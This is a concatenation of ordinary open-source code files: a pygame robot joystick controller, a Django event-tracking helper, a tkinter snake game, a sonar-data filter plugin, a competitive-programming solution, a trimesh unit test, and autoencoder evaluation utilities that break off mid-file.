self._quit = True\n\n __METHODS = {\n pygame.JOYAXISMOTION: __set_axis,\n pygame.JOYBALLMOTION: __set_ball,\n pygame.JOYBUTTONDOWN: __set_button_down,\n pygame.JOYBUTTONUP: __set_button_up,\n pygame.JOYHATMOTION: __set_hat,\n pygame.QUIT: set_quit\n }\n\n def listen(self):\n \"\"\"\n Listen to controller events.\n \"\"\"\n if not self.is_ctrl_init:\n self._clog.error(\"The init_ctrl method must be called before \"\n \"the listen method.\")\n self.set_quit()\n\n while not self._quit:\n for event in pygame.event.get():\n self.__METHODS[event.type](self, event)\n self.process_event()\n else:\n #self._clog.warning(\"Waiting for controller\")\n time.sleep(self.event_wait_time)\n\n self._clog.info(\"Exiting\")\n\n def process_event(self):\n \"\"\"\n Process the current events. This method needs to be overridden.\n \"\"\"\n raise NotImplementedError(\n \"Programming error: must implement {}\".format(\n process_event.__name__))\n\n def is_ps4(self):\n \"\"\"\n Is a PS4 controller attached?\n\n .. note::\n The current way this is determined may not be reliable, but\n as of now, it's the best way I have found.\n \"\"\"\n return len(self.axis_data) == 6\n\n\nclass JoyStickControl(PYGameController, Daemon):\n \"\"\"\n This class allows control of the MonsterBorg by a PS3/4 controller.\n \"\"\"\n _LOG_PATH = os.path.join(LOG_PATH, 'mborg_pygame.log')\n _BASE_LOGGER_NAME = 'examples'\n _LOGGER_NAME = 'examples.mborg-pygame'\n _CTRL_LOGGER_NAME = 'examples.controller'\n _TBORG_LOGGER_NAME = 'examples.tborg'\n _PIDFILE = os.path.join(RUN_PATH, 'mborg_pygame.pid')\n _VOLTAGE_IN = 1.2 * 10\n _VOLTAGE_OUT = 12.0 * 0.95\n _PROCESS_INTERVAL = 0.00\n _MAX_POWER = (1.0 if _VOLTAGE_OUT > _VOLTAGE_IN\n else _VOLTAGE_OUT / float(_VOLTAGE_IN))\n _ROTATE_TURN_SPEED = 0.5\n _SLOW_SPEED = 0.5\n\n def __init__(self, bus_num=ThunderBorg.DEFAULT_BUS_NUM,\n address=ThunderBorg.DEFAULT_I2C_ADDRESS,\n log_level=logging.INFO, debug=False):\n self._debug = debug\n log_level = logging.DEBUG if debug else log_level\n cl = ConfigLogger()\n cl.config(logger_name=self._BASE_LOGGER_NAME,\n file_path=self._LOG_PATH,\n level=log_level)\n self._log = logging.getLogger(self._LOGGER_NAME)\n\n if not self._debug:\n self._tb = ThunderBorg(bus_num=bus_num,\n address=address,\n logger_name=self._TBORG_LOGGER_NAME,\n log_level=log_level)\n\n PYGameController.__init__(self, logger_name=self._CTRL_LOGGER_NAME,\n log_level=log_level, debug=debug)\n Daemon.__init__(self, self._PIDFILE, logger_name=self._LOGGER_NAME,\n verbose=2 if debug else 0)\n\n def run(self):\n \"\"\"\n Start the controller listening process.\n \"\"\"\n self.init_controller()\n\n if not self._debug:\n # Turn on failsafe.\n self._tb.set_comms_failsafe(True)\n\n if self._tb.get_comms_failsafe():\n self.log_battery_monitoring()\n self.init_mborg()\n else:\n self._clog.error(\"The failsafe mode could not be turned on.\")\n self.set_quit()\n\n try:\n self.listen()\n except (KeyboardInterrupt, ThunderBorgException) as e:\n self._log.warn(\"Exiting event processing, %s\", e)\n except Exception as e:\n self._log.error(\"Unknown error, %s\", e, exc_info=True)\n finally:\n self._tb.halt_motors()\n self._tb.set_comms_failsafe(False)\n self._tb.set_led_battery_state(False)\n self._tb.set_both_leds(0, 0, 0) # Set LEDs off\n self._log.info(\"Exiting\")\n sys.exit()\n\n def log_battery_monitoring(self):\n \"\"\"\n Dump to the log the initial battery values.\n \"\"\"\n level_min, level_max = self._tb.get_battery_monitoring_limits()\n current_level = self._tb.get_battery_voltage()\n mid_level = (level_min + level_max) / 2\n buf = six.StringIO()\n buf.write(\"\\nBattery Monitoring Settings\\n\")\n buf.write(\"---------------------------\\n\")\n buf.write(\"Minimum (red) {:02.2f} V\\n\".format(level_min))\n buf.write(\"Middle (yellow) {:02.2f} V\\n\".format(mid_level))\n buf.write(\"Maximum (green) {:02.2f} V\\n\".format(level_max))\n buf.write(\"Current Voltage {:02.2f} V\\n\".format(current_level))\n self._log.info(buf.getvalue())\n buf.close()\n\n def init_mborg(self):\n \"\"\"\n Initialize the MonsterBorg joystick controller.\n \"\"\"\n self._tb.halt_motors()\n self._tb.set_led_battery_state(False)\n self._tb.set_both_leds(0, 0, 1) # Set to blue\n self.event_wait_time = self._PROCESS_INTERVAL\n\n if not self.is_ctrl_init:\n self._log.warn(\"Could not initialize \")\n self._tb.set_comms_failsafe(False)\n self._tb.set_both_leds(0, 0, 0) # Set LEDs off\n sys.exit()\n\n self.set_defaults()\n self._tb.set_led_battery_state(True)\n self._led_battery_mode = True\n self._log.debug(\"Finished mborg_joy initialization.\")\n\n def process_event(self):\n \"\"\"\n Process the current events (overrides the base class method).\n \"\"\"\n # Invert the controller Y axis to match the motor fwd/rev.\n # If the Y axis needs to be inverted do that also.\n if self.axis_y_invert:\n motor_one = motor_two = self.axis_data.get(self.LF_UD)\n else:\n motor_one = motor_two = -self.axis_data.get(self.LF_UD)\n\n if self.axis_x_invert:\n x = -self.axis_data.get(self.RT_LR)\n else:\n x = self.axis_data.get(self.RT_LR)\n\n # Rotate turn button press\n if not self.button_data.get(self.rotate_turn_button):\n x *= self.rotate_turn_speed\n\n if x > 0.05:\n motor_one *= 1.0 - (2.0 * x)\n elif x < -0.05:\n motor_two *= 1.0 + (2.0 * x)\n\n # Drive slow button press\n if self.button_data.get(self.drive_slow_button):\n motor_one *= self.drive_slow_speed\n motor_two *= self.drive_slow_speed\n\n if not self._debug:\n self._tb.set_motor_one(motor_one * self._MAX_POWER)\n self._tb.set_motor_two(motor_two * self._MAX_POWER)\n\n # Set LEDs to purple to indicate motor faults.\n if (self._tb.get_drive_fault_one()\n or self._tb.get_drive_fault_two()):\n if self._led_battery_mode:\n self._tb.set_led_battery_state(False)\n self._tb.set_both_leds(1, 0, 1) # Set to purple\n self._led_battery_mode = False\n elif not self._led_battery_mode:\n self._tb.set_led_battery_state(True)\n self._led_battery_mode = True\n\n def set_defaults(self, **kwargs):\n \"\"\"\n Set some default values. This method can be set while running. For\n example if the robot flips over which could be determined with a\n sensor the axis invert values can be changed.\n\n :param axis_y_invert: If set to `True` the up/down control is\n inverted. Default is `False`. Can be used\n if the robot flips over.\n :type axis_y_invert: bool\n :param axis_x_invert: If set to `True` the left/right control is\n inverted. Default is `False`. Can be used\n if the robot flips over.\n :type axis_x_invert: bool\n :param rotate_turn_button: Choose the button for rotation. The\n default is R1 (5).\n :type rotate_turn_button: int\n :param rotate_turn_speed: Choose the speed for rotation. The\n default is 0.5.\n :type rotate_turn_speed: float\n :param drive_slow_button: Choose the button for driving slow. The\n default is R2 (6).\n :type drive_slow_but: int\n :param drive_slow_speed: Choose the speed to decrease to when the\n drive-slow button is held.\n :type drive_slow_speed: bool\n \"\"\"\n tmp_kwargs = kwargs.copy()\n self.axis_y_invert = tmp_kwargs.pop('axis_y_invert', False)\n self.axis_x_invert = tmp_kwargs.pop('axis_x_invert', False)\n self.rotate_turn_button = tmp_kwargs.pop(\n 'rotate_turn_button', self.R1)\n self.rotate_turn_speed = tmp_kwargs.pop(\n 'rotate_turn_speed', self._ROTATE_TURN_SPEED)\n self.drive_slow_button = tmp_kwargs.pop(\n 'drive_slow_button', self.L1)\n self.drive_slow_speed = tmp_kwargs.pop(\n 'drive_slow_speed', self._SLOW_SPEED)\n\n if kwargs:\n self._log.error(\"Invalid arguments found: %s\", kwargs)\n\n\nif __name__ == '__main__': # pragma: no cover\n import argparse\n\n parser = argparse.ArgumentParser(\n description=(\"JoyStick Control Using PYGame\"))\n parser.add_argument(\n '-d', '--debug', action='store_true', default=False, dest='debug',\n help=\"Run in debug mode (no thunderborg code is run).\")\n parser.add_argument(\n '-s', '--start', action='store_true', default=False, dest='start',\n help=\"Start the daemon.\")\n parser.add_argument(\n '-r', '--restart', action='store_true', default=False, dest='restart',\n help=\"Restart the daemon.\")\n parser.add_argument(\n '-S', '--stop', action='store_true', default=False, dest='stop',\n help=\"Stop the daemon.\")\n options = parser.parse_args()\n arg_value = (options.start ^ options.restart ^ options.stop)\n\n if not arg_value and arg_value is not False:\n print(\"Can only set one of 'start', 'restart' or 'stop'.\")\n sys.exit(-1)\n\n if options.start:\n arg = 'start'\n elif options.restart:\n arg = 'restart'\n elif options.stop:\n arg = 'stop'\n else:\n arg = 'start'\n\n jsc = JoyStickControl(debug=options.debug)\n getattr(jsc, arg)()\n","repo_name":"cnobile2012/python-thunderborg","sub_path":"tborg/examples/mborg_pygame.py","file_name":"mborg_pygame.py","file_ext":"py","file_size_in_byte":15727,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"21772467995","text":"import re\n\nfrom urllib.parse import urlparse\nfrom uuid import uuid4\n\nfrom django.conf import settings\nfrom django.utils import timezone\n\nfrom hoop.hula import Hula\nfrom hoop.util.dates import encode_datetime\nfrom hoop.util.user_agent import is_mobile\n\nTRACKING_COOKIE_KEY = 'hoop-sid'\nTRACKING_COOKIE_MAX_AGE = 90 * 24 * 60 * 60 # 90 Days\nBOOKING_REFERER_COOKIE_KEY = 'hoop-booking-referer'\n\n# Util method for sending tracking data to Tracking Service.\n# Also sets a session_id cookie on the client\ndef track_events(request, response, events):\n try:\n user_agent = request.META['HTTP_USER_AGENT']\n except KeyError:\n return False\n\n if not user_agent:\n return False\n\n bot_user_agent_strings = [\n 'bot',\n 'spider',\n 'facebookexternalhit',\n 'crawler',\n 'sentry',\n 'spaziodati',\n 'mediapartners',\n ]\n bot_re = '({})'.format('|'.join(bot_user_agent_strings))\n if re.search(bot_re, user_agent, re.IGNORECASE) is not None:\n return False\n\n session_id = request.COOKIES.get(TRACKING_COOKIE_KEY)\n if not session_id:\n session_id = str(uuid4())\n\n for event in events:\n event['sessionID'] = session_id\n event['systemType'] = 'Web'\n event['deviceModel'] = 'Mobile' if is_mobile(request) else 'Desktop'\n event['extra'] = user_agent\n event['id'] = str(uuid4())\n event['date'] = encode_datetime(timezone.now())\n event['appVersion'] = settings.GIT_HASH\n\n if event.get('screenName') is not None:\n event['screenViewURL'] = request.get_full_path()\n\n Hula().execute('tracking', 'events.add', events, background=True, version='v1')\n\n domain = request.get_host().split(':')[0]\n response.set_cookie(TRACKING_COOKIE_KEY, session_id, max_age=TRACKING_COOKIE_MAX_AGE, domain=domain)\n\n return True\n\n\ndef set_referer_cookie(request, response):\n try:\n referer_url = request.META['HTTP_REFERER']\n except KeyError:\n return\n\n domain = request.get_host().split(':')[0]\n url = urlparse(referer_url)\n response.set_cookie(BOOKING_REFERER_COOKIE_KEY, url.path + ('?' + url.query if url.query else ''), domain=domain)\n\n return True\n\ndef get_referer_from_cookie(request):\n return request.COOKIES.get(BOOKING_REFERER_COOKIE_KEY)\n","repo_name":"0x216/Hoop-Libaries","sub_path":"hoop/tracking/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17137918107","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSnake is multiplayer game with bots.\n\"\"\"\n\nimport tkinter as tk\nfrom random import randint, choice\n\n\nclass Pole:\n def __init__(self, master, width, height, scale, bg='white'):\n self.master = master\n self.width = width\n self.height = height\n self.width_real = width * scale\n self.height_real = height * scale\n self.scale = scale\n self.bg = bg\n\n self.pole = tk.Canvas(self.master, width=self.width_real,\n height=self.height_real, bg=self.bg)\n self.pole.pack()\n\n self.snakes = []\n self.eats = []\n\n def get_scale(self):\n return self.scale\n\n def set_snake_bot(self, num):\n \"\"\"Add number bots\"\"\"\n for i in range(num):\n self.snakes.append(Snake_bot(self))\n for sn in self.snakes:\n if sn.typer == 'bot':\n sn.search()\n\n def set_snake_user(self, list_com_keys):\n \"\"\"Add user snake\n ---\n Parameters:\n list_com_keys - list of key left, rigth, up, down\"\"\"\n left, right, up, down = list_com_keys\n self.snakes.append(Snake(self))\n self.snakes[-1].bind_keys(left, right, up, down)\n\n def set_eats(self, num):\n for i in range(num):\n self.eats.append(Eat(self))\n\nclass Information:\n def __init__(self, master):\n self.master = master\n self.label = tk.Label(master)\n self.label.pack()\n\n def update(self, snake):\n x, y = snake.body[0].get_coords()\n length = snake.length\n speed = snake.speed\n string = 'X = {}, Y = {}, length = {}, speed = {}'.format(x, y, length, speed)\n self.label['text'] = string\n\n\nclass Elem:\n def __init__(self, pole, x, y, color='black'):\n self.pole = pole\n self.x = x\n self.y = y\n self.color = color\n self.scale = self.pole.get_scale()\n x0, y0, x1, y1 = self.real_coords()\n\n self.elem = self.pole.pole.create_rectangle(x0, y0, x1, y1, fill=color)\n\n def real_coords(self):\n x0 = self.x * self.scale + 1\n y0 = self.y * self.scale + 1\n x1 = (self.x + 1) * self.scale\n y1 = (self.y + 1) * self.scale\n return x0, y0, x1, y1\n\n def move(self, dx, dy):\n self.x += dx\n self.y += dy\n self.x = self.x % self.pole.width\n self.y = self.y % self.pole.height\n x0, y0, x1, y1 = self.real_coords()\n self.pole.pole.coords(self.elem, x0, y0, x1, y1)\n\n def check_move(self, dx, dy):\n return self.x + dx, self.y +dy\n\n def teleport(self, x, y):\n self.x = x\n self.y = y\n self.x = self.x % self.pole.width\n self.y = self.y % self.pole.height\n x0, y0, x1, y1 = self.real_coords()\n self.pole.pole.coords(self.elem, x0, y0, x1, y1)\n\n def get_coords(self):\n return self.x, self.y\n\n def destroy(self):\n self.pole.pole.delete(self.elem)\n\n def set_color(self, color):\n self.color = color\n self.pole.pole.itemconfig(self.elem, fill=color)\n\n\ncolor_snake = ('black', 'blue', 'cyan', 'gray', 'cyan', 'orange') * 5\n\nclass Snake:\n count = 0\n def __init__(self, pole):\n self.id = Snake.count # идентификатор объекта\n Snake.count +=1\n\n # type snake - bot or user\n self.typer = 'bot'\n\n self.pole = pole\n self.direction = 'r'\n self.speed = 10 # клеток в секунду\n self.job = None\n self.length = 1\n width = pole.width\n height = pole.height\n x = randint(0, width-1)\n y = randint(0, height-1)\n self.body = [Elem(self.pole, x, y, color=color_snake[self.id])]\n\n self.info = Information(self.pole.master)\n\n self.previos_move = [0, 0]\n\n def growth(self, eat):\n x, y = eat.get_coords()\n color = eat.color\n self.body.insert(1, Elem(self.pole, x, y, color))\n\n def move(self): # сюда засовываем еду, чтобы при поедании новый объект появлялся\n\n gameover = False # если флаг меняется, то игра останавливается\n\n dx, dy = 0, 0\n if self.direction == 'r': dx = 1\n if self.direction == 'l': dx = -1\n if self.direction == 'd': dy = 1\n if self.direction == 'u': dy = -1\n\n if self.previos_move == [dx * -1, dy * -1]:\n dx = self.previos_move[0]\n dy = self.previos_move[1]\n\n eat = True # если съел, то ключ меняется на false и движение в этом такте не происходит\n for i in range(len(self.pole.eats)):\n if self.get_coords() == self.pole.eats[i].get_coords(): # съел, удалил старый, добавил новый\n self.length += 1\n self.growth(self.pole.eats[i])\n self.pole.eats[i].destroy()\n self.pole.eats[i] = Eat(self.pole)\n eat = False\n break\n if eat:\n for i in range(len(self.body)-1, 0, -1): # от последнего элемента до второго\n x, y = self.body[i-1].get_coords()\n self.body[i].teleport(x, y)\n self.body[0].move(dx, dy) # голову отдельно перемещаем\n\n # обработка препятствия в виде своего хвоста\n for i in self.get_list_coords_tail(): # если голова попала на препятствие, то проигрыш\n if self.get_coords() == i:\n print('game over')\n self.pole.master.after_cancel(self.job)\n gameover = True\n self.set_color('red')\n break\n for sn in self.pole.snakes:\n if self.id != sn.id: # отсекаем тот же объект змеи в списке\n for i in sn.get_list_coords():\n if self.get_coords() == i:\n print('game over')\n self.pole.master.after_cancel(self.job)\n gameover = True\n self.set_color('red')\n break\n\n self.info.update(self) # обновление счета\n if gameover == False:\n self.job = self.pole.master.after(self.get_time_speed(), self.move) # записываем в переменую, чтобы потом уничтожить\n self.previos_move = [dx, dy]\n\n def direct(self, direction):\n self.direction = direction\n if self.job:\n self.pole.master.after_cancel(self.job) # штука уничтожает процесс after\n self.move()\n\n def get_coords(self):\n return self.body[0].get_coords()\n\n def get_list_coords_tail(self):\n return (i.get_coords() for i in self.body[1:])\n\n def get_list_coords(self):\n return (i.get_coords() for i in self.body)\n\n def get_time_speed(self):\n return int(1000 / self.speed)\n\n def set_color(self, color):\n for el in self.body:\n el.set_color(color)\n\n def bind_keys(self, left, right, up, down):\n \"\"\"Set key for manipulating snake and set snake as gamer type\n Key code as used in tkinter\"\"\"\n self.typer = 'user'\n self.pole.master.bind(left, lambda event: self.direct('l'))\n self.pole.master.bind(right, lambda event: self.direct('r'))\n self.pole.master.bind(up, lambda event: self.direct('u'))\n self.pole.master.bind(down, lambda event: self.direct('d'))\n\n\nclass Snake_bot(Snake):\n def search(self):\n xe, ye = self.pole.eats[0].get_coords()\n xs, ys = self.get_coords()\n for eat in self.pole.eats[1:]:\n xe_, ye_ = eat.get_coords()\n if abs(xe_ - xs + ye_ - ys) < abs(xe - xs + ye - xs):\n xe = xe_\n ye = ye_\n dx = xe - xs\n dy = ye - ys\n rand = randint(0,1)\n if dx == 0 and dy == 0:\n pass\n elif dx == 0:\n if dy > 0:\n self.direct('d')\n else:\n self.direct('u')\n elif dy == 0:\n if dx > 0:\n self.direct('r')\n else:\n self.direct('l')\n else:\n if rand == 0:\n if dx > 0:\n self.direct('r')\n else:\n self.direct('l')\n else:\n if dy > 0:\n self.direct('d')\n else:\n self.direct('u')\n self.pole.master.after(self.get_time_speed(), self.search)\n\n\nlst_color_eat = ('green', 'blue', 'yellow', 'pink', 'gray', 'cyan', 'orange')\nlst_color_eat =('yellow',)\n\nclass Eat:\n def __init__(self, pole):\n self.pole = pole\n self.color = choice(lst_color_eat)\n width = pole.width\n height = pole.height\n x = randint(0, width-1)\n y = randint(0, height-1)\n self.eat = Elem(self.pole, x, y, color=self.color)\n\n def destroy(self):\n self.eat.destroy()\n\n def get_coords(self):\n return self.eat.get_coords()\n\n\n\ndef main():\n\n root = tk.Tk()\n root.title('Snaюка')\n # Ititialisation game pole with width, height and scale\n pole = Pole(root, width=80, height=45, scale=20)\n # Add info frame\n info = Information(root)\n # Set number eats for snake\n pole.set_eats(20)\n # Set number bots of snake\n pole.set_snake_bot(10)\n # Add user snake and binding key for manipulating\n pole.set_snake_user(('a', 'd', 'w', 's'))\n pole.set_snake_user(('', '', '', ''))\n\n root.mainloop()\n\nif __name__ == '__main__':\n main()\n","repo_name":"maewec/game_snake","sub_path":"snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":10449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33425954015","text":"import numpy as np\n\nfrom HSTB.kluster.modules.filter import BaseFilter\nfrom HSTB.kluster import kluster_variables\n\n\nclass Filter(BaseFilter):\n def __init__(self, fqpr, selected_index=None):\n super().__init__(fqpr, selected_index)\n self.controls = []\n self.description = 'Re-accept all soundings that are currently rejected.'\n\n def _run_algorithm(self):\n print(f'Running reaccept_rejected on {self.fqpr.output_folder}')\n self.new_status = [] # new_status will be a list where each element is a 2d array of new detectioninfo (sounding flag) values\n for cnt, rp in enumerate(self.fqpr.multibeam.raw_ping): # for each sonar head...\n # much easier to work in 1dimension, can either go to numpy and flatten (this is more mem efficient / faster)\n rp_detect = rp['detectioninfo'].values.flatten()\n # or you can use xarray stack, which will get you the time/beam of each value, which might be useful, but can use up a lot of memory\n # rp_detect = rp['detectioninfo'].stack({'sounding': ('time', 'beam')})\n\n # where our mask is True, we set to rejected\n rp_detect[rp_detect == kluster_variables.rejected_flag] = kluster_variables.accepted_flag\n # reshape our new detectioninfo (to get back to 2d) and append to our new_status attribute\n self.new_status.append(rp_detect.reshape(rp['detectioninfo'].shape))\n print(f'reaccept_rejected complete')\n","repo_name":"noaa-ocs-hydrography/kluster","sub_path":"HSTB/kluster/plugins/filters/reaccept_rejected.py","file_name":"reaccept_rejected.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"3"} +{"seq_id":"23473704689","text":"n=int(input())\ns=input()\n\nabxy=\"ABXY\"\n\nans=1e9\n\nfor i in range(4):\n for j in range(4):\n l=abxy[i]+abxy[j]\n\n for ii in range(4):\n for jj in range(4):\n r=abxy[ii]+abxy[jj]\n\n if l == r:\n continue\n\n cnt=0\n idx=0\n\n while idx < n:\n if idx == n-1:\n cnt+=1\n break\n\n if s[idx]+s[idx+1] == l or s[idx]+s[idx+1] == r:\n idx+=2\n else:\n idx+=1\n\n cnt+=1\n\n ans=min(ans,cnt)\n\nprint(ans)\n","repo_name":"rtake/atcoder","sub_path":"arc002/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22471502067","text":"try:\n from . import generic as g\nexcept BaseException:\n import generic as g\n\n\nclass IntervalTest(g.unittest.TestCase):\n\n def test_intersection(self):\n\n pairs = g.np.array([[[0, 1], [1, 2]],\n [[1, 0], [1, 2]],\n [[0, 0], [0, 0]],\n [[10, 20], [9, 21]],\n [[5, 15], [7, 10]],\n [[5, 10], [10, 9]],\n [[0, 1], [0.9, 10]]])\n tru_hit = [False,\n False,\n False,\n True,\n True,\n True,\n True]\n tru_int = g.np.array([[0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n [10, 20],\n [7, 10],\n [9, 10],\n [0.9, 1.0]])\n\n func = g.trimesh.interval.intersection\n\n # check the single- interval results\n for ab, h, i in zip(pairs, tru_hit, tru_int):\n r_h, r_i = func(*ab)\n assert g.np.allclose(r_i, i)\n assert r_h == h\n\n # check the vectorized multiple interval results\n r_h, r_i = func(pairs[:, 0, :], pairs[:, 1, :])\n assert g.np.allclose(r_h, tru_hit)\n assert g.np.allclose(r_i, tru_int)\n\n\nif __name__ == '__main__':\n g.trimesh.util.attach_to_log()\n g.unittest.main()\n","repo_name":"mikedh/trimesh","sub_path":"tests/test_interval.py","file_name":"test_interval.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":2558,"dataset":"github-code","pt":"3"} +{"seq_id":"13230157627","text":"\"\"\"\nAuthor: Talip Ucar\nEmail: ucabtuc@gmail.com\nVersion: 0.1\nDescription: Utility functions for evaluations (used in 1_eval.py)\n\"\"\"\n\nimport os\nfrom os.path import dirname, abspath\n\nimport torch as th\nimport torch.utils.data\n\nfrom utils.utils import tsne\n\nimport numpy as np\nimport seaborn as sns\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn import manifold\nfrom sklearn.decomposition import PCA\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\n\ntorch.manual_seed(1)\n\n\ndef linear_model_eval_wrapper(config, Xdata, Xrecon, Xtran_to_ds1, Xtran_to_ds2, Xtran_to_ds3, clabels, dlabels_raw,\n mode, save_files=False):\n # Extract samples in each domain from the input data\n Xds1, Xds2, Xds3 = get_translated_outputs(Xdata, dlabels_raw)\n\n # Extract cohort labels in each domain from the input labels\n clabels_ds1, clabels_ds2, clabels_ds3 = get_translated_outputs(clabels, dlabels_raw)\n\n # Extract samples in each domain that are translated to ds1\n Xds1_to_ds1, Xds2_to_ds1, Xds3_to_ds1 = get_translated_outputs(Xtran_to_ds1, dlabels_raw)\n\n # Extract samples in each domain that are translated to ds2\n Xds1_to_ds2, Xds2_to_ds2, Xds3_to_ds2 = get_translated_outputs(Xtran_to_ds2, dlabels_raw)\n\n # Extract samples in each domain that are translated to ds3\n Xds1_to_ds3, Xds2_to_ds3, Xds3_to_ds3 = get_translated_outputs(Xtran_to_ds3, dlabels_raw)\n\n # The Linear model is trained on the raw data, and tested on reconstructed samples.\n print(20 * \"*\" + \"Classification test in data space\" + 20 * \"*\")\n linear_model_eval(Xdata, dlabels_raw, Xrecon, dlabels_raw,\n description=\"Trained on input original domains, tested on reconstructions\")\n\n # Trained on domain 3, and tested on translation from domain 1 i.e. 1->3\n print(20 * \"*\" + \"Classification test in data space\" + 20 * \"*\")\n linear_model_eval(Xds3, clabels_ds3, Xds1_to_ds3, clabels_ds1,\n description=\"Trained on input original Domain-3, tested on translations from Domain-1\")\n\n # Trained on domain 3, and tested on translation from domain 2 i.e. 2->3\n print(20 * \"*\" + \"Classification test in data space\" + 20 * \"*\")\n linear_model_eval(Xds3, clabels_ds3, Xds2_to_ds3, clabels_ds2,\n description=\"Trained on input original Domain-3, tested on translations from Domain-2\")\n\n # Trained on domain 1, and tested on translation from domain 2 i.e. 2->1\n print(20 * \"*\" + \"Classification test in data space\" + 20 * \"*\")\n linear_model_eval(Xds1, clabels_ds1, Xds2_to_ds1, clabels_ds2,\n description=\"Trained on input original Domain-1, tested on translations from Domain-2\")\n\n # Trained on domain 2, and tested on translation from domain 1 i.e. 1->2\n print(20 * \"*\" + \"Classification test in data space\" + 20 * \"*\")\n linear_model_eval(Xds2, clabels_ds2, Xds1_to_ds2, clabels_ds1,\n description=\"Trained on input original Domain-2, tested on translations from Domain-1\")\n\n # Save translation from domain 1 -> 2, and 2 -> 1 to use them later\n if save_files:\n print(f\"Saving ds1->ds2 and ds2->ds1 translations as csv files...\")\n cl_path = \"./results/\" + config[\"framework\"] + \"/evaluation/clusters/\"\n save_np2csv([Xds1_to_ds2, clabels_ds1], save_as=cl_path + \"/ds1_to_ds2_\" + mode + \".csv\")\n save_np2csv([Xds2_to_ds1, clabels_ds2], save_as=cl_path + \"/ds2_to_ds1_\" + mode + \".csv\")\n save_np2csv([Xrecon, dlabels_raw], save_as=cl_path + \"/xrecon_dlabels_\" + mode + \".csv\")\n save_np2csv([Xrecon, clabels], save_as=cl_path + \"/xrecon_clabels_\" + mode + \".csv\")\n save_np2csv([Xdata, dlabels_raw], save_as=cl_path + \"/Xinput_dlabels_\" + mode + \".csv\")\n save_np2csv([Xdata, clabels], save_as=cl_path + \"/Xinput_clabels_\" + mode + \".csv\")\n\n\ndef translate_to_new_domain(autoencoder, config, Xdata, Xtran_to_ds3_l, ztran_to_ds3_l, to_domain=2):\n # Create labels to translate all domains to one particular domain\n dlabels_for_translation = domain_labels_for_tranlation(config, domain_label=[to_domain])\n\n # Prepare input data for translation to a particular domain\n input_data_trans = [Xdata, dlabels_for_translation] if config[\"conditional\"] else Xdata\n\n # 1st Forward pass on the Autoencoder for translation to specific domain\n Xrecon1, _, _, _ = autoencoder(input_data_trans)\n # 2nd Forward pass on the Autoencoder to get translations in latent space\n _, zt, _, _ = autoencoder([Xrecon1, dlabels_for_translation])\n\n # Save translations in reconstruction and latent space to the lists\n Xrecon1 = Xrecon1.cpu().numpy()\n zt = zt.cpu().numpy()\n\n Xtran_to_ds3_l.append(Xrecon1)\n ztran_to_ds3_l.append(zt)\n\n return Xtran_to_ds3_l, ztran_to_ds3_l\n\n\ndef linear_model_eval(X_train, y_train, X_test, y_test, use_scaler=False, description=\"Baseline: PCA + Logistic Reg.\"):\n \"\"\"\n :param ndarray X_train:\n :param list y_train:\n :param ndarray X_test:\n :param list y_test:\n :param bool use_scaler:\n :param str description:\n :return:\n \"\"\"\n # Initialize Logistic regression\n clf = RandomForestClassifier(\n n_estimators=100) # LogisticRegression(random_state=0, max_iter=1200, solver='lbfgs', C=0.1)\n # Fit model to the data\n clf.fit(X_train, y_train)\n # Summary of performance\n print(10 * \">\" + description)\n print(\"Train score:\", clf.score(X_train, y_train))\n print(\"Test score:\", clf.score(X_test, y_test))\n\n\ndef plot_clusters(config, z, ztran_to_ds3, clabels, dlabels_raw, plot_suffix=\"_inLatentSpace\"):\n # Number of columns for legends, where each column corresponds to a cluster/cohort\n ncol = len(list(set(clabels)))\n # dlegends = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", ...]\n dlegends = [str(i + 1) for i in range(len(list(set(dlabels_raw))))]\n # clegends = [\"A\", \"B\", \"C\", \"D\", ...]..choose first ncol characters, one per coluster\n clegends = list(\"ABCDEFGH\")[0:ncol]\n # Create new labels so that we can show cohorts and domains together. These labels will be used as keys to a dict to map to legend names\n new_labels = 4 * clabels + dlabels_raw\n\n # Show domains only\n visualise_clusters(config, z, dlabels_raw, plt_name=\"domains\" + plot_suffix, legend_title=\"Domains\",\n legend_labels=dlegends)\n # Show cohorts only\n visualise_clusters(config, z, clabels, plt_name=\"cohorts\" + plot_suffix, legend_title=\"Cohorts\",\n legend_labels=clegends)\n # Show both cohorts and domains\n visualise_clusters(config, z, new_labels, plt_name=\"domain_cohorts\" + plot_suffix, alpha=1.0,\n legend_title=\"Cohorts/Domains\", ncol=ncol)\n\n # Plot translations from all domains to a particular domain (e.g. ds3)\n # Show both cohorts and domains\n visualise_clusters(config, ztran_to_ds3, new_labels, plt_name=\"domains_cohorts_translations\" + plot_suffix,\n alpha=1.0, legend_title=\"Cohorts/Domains\", ncol=ncol)\n # Show domains only\n visualise_clusters(config, ztran_to_ds3, dlabels_raw, plt_name=\"domains_translations\" + plot_suffix,\n legend_title=\"Domains\", legend_labels=dlegends)\n\n\ndef visualise_clusters(config, embeddings, labels, plt_name=\"test\", alpha=1.0, legend_title=None, legend_labels=None,\n ncol=1):\n \"\"\"\n :param ndarray embeddings: Latent representations of samples.\n :param ndarray labels: Class labels;\n :param plt_name: Name to be used when saving the plot.\n :return: None\n \"\"\"\n # Define colors to be used for each class/cluster/cohort\n color_list = ['#66BAFF', '#FFB56B', '#8BDD89', '#faa5f3', '#fa7f7f',\n '#008cff', '#ff8000', '#04b000', '#de4bd2', '#fc3838',\n '#004c8b', \"#964b00\", \"#026b00\", \"#ad17a1\", '#a80707',\n \"#00325c\", \"#e41a1c\", \"#008DF9\", \"#570950\", '#732929']\n\n color_list2 = ['#66BAFF', 